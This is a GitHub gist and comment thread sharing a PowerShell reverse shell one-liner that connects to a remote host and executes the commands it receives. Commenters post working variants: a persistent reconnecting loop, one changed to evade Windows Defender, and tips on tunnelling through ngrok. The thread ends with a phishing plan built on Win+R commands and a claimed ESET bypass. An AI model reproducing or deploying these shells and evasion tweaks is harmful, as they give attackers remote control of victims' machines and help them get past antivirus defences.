powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok

powershell_reverse_shell.ps1

# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Looks like the shell did not return stderr, is it possible to return stderr as well?

hey @mappl3, feel free to add this in your fork and i'll update it ;) . you can also append 2>&1 to the end of a command to get stderr

Got stderr working with this modification:
$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
And if you want to catch some errors:
$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);try { $sendback = (iex ". { $data } 2>&1" | Out-String ); } catch { $sendback = "$_`n"}; $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

that's the one-liner updated with your addition for stderr. thanks for your contribution @Veids!

The Windows Defender action is triggerd by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"

This actually still works and doesn't trigger anything

How would I run this from a bat file and what book do you recommend to learn powershell scripting on this level

Thanks for all your works! I have a question , how can i use this ps1 whit ngrok? If i change ip and port doesnt work on nc -nlvp 4444 (port i forward whit ngrok )

Thanks for all your works! I have a question , how can i use this ps1 whit ngrok? If i change ip and port doesnt work on nc -nlvp 4444 (port i forward whit ngrok )

In order to connect via port 4444, port 4444 has to also be open on your target. Try a different port like 53

while($true){try{$c=New-Object System.Net.Sockets.TCPClient("your server",8880);$s=$c.GetStream();$nl=[Environment]::NewLine;$m=[System.Text.Encoding]::UTF8.GetBytes('asprsh'+$nl+'{"a":"a"}'+$nl);$s.Write($m,0,$m.Length);$s.Flush();[byte[]]$b=0..65535|%{0};while($true){if(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$ec=@("exit", "quit", "bye", "logout", "close");if($d -in $ec) {continue;} else { $g=(iex $d 2>&1 | Out-String );$w=$g+$nl+"PS "+(pwd).Path+"# ";$p=([text.encoding]::ASCII).GetBytes($w);$s.Write($p,0,$p.Length);$s.Flush()}};$c.Close();}catch{Start-Sleep -Seconds 2};};

Congrats bro, you made it into a CompTIA sponsored course on cybersecurity
https://i.imgur.com/eN7OCjl.png

I think I was pretty clear on attribution @jzburda

im having issues getting it to run

You can use reverseshell .com online website rhatbis very easy

…

On Fri, 9 May, 2025, 8:16 am chennaultj2, ***@***.***> wrote: ***@***.**** commented on this gist. ------------------------------ im having issues getting it to run Screenshot.2025-05-08.224559.png (view on web) <https://gist.github.com/user-attachments/assets/607cd0d4-ca24-45c8-a39c-275f2a5fa447> — Reply to this email directly, view it on GitHub <https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3#gistcomment-5572460> or unsubscribe <https://github.com/notifications/unsubscribe-auth/AQ44F6W6VTKADXERBOBYUN325QJJHBFKMF2HI4TJMJ2XIZLTSKBKK5TBNR2WLJDUOJ2WLJDOMFWWLO3UNBZGKYLEL5YGC4TUNFRWS4DBNZ2F6YLDORUXM2LUPGBKK5TBNR2WLJDHNFZXJJDOMFWWLK3UNBZGKYLEL52HS4DFVRZXKYTKMVRXIX3UPFYGLK2HNFZXIQ3PNVWWK3TUUZ2G64DJMNZZDAVEOR4XAZNEM5UXG5FFOZQWY5LFVA4DOMJQGUYTKMVHORZGSZ3HMVZKMY3SMVQXIZI> . You are receiving this email because you commented on the thread. Triage notifications on the go with GitHub Mobile for iOS <https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675> or Android <https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub> .

i dont see that lol

I've been trying to realize a small phishing campaign and got an idea to use win+R to execute some prepared commands to phish targets (all in educational purposes for my bachelor's). I managed to successfully bypass ESET AV solution, but Defender seems to be stopping me from executing anything that is nearly suspicious from win+R. I've tried -E powershell tag, also tried obfuscating the command but found no success. Did anyone try to play with this?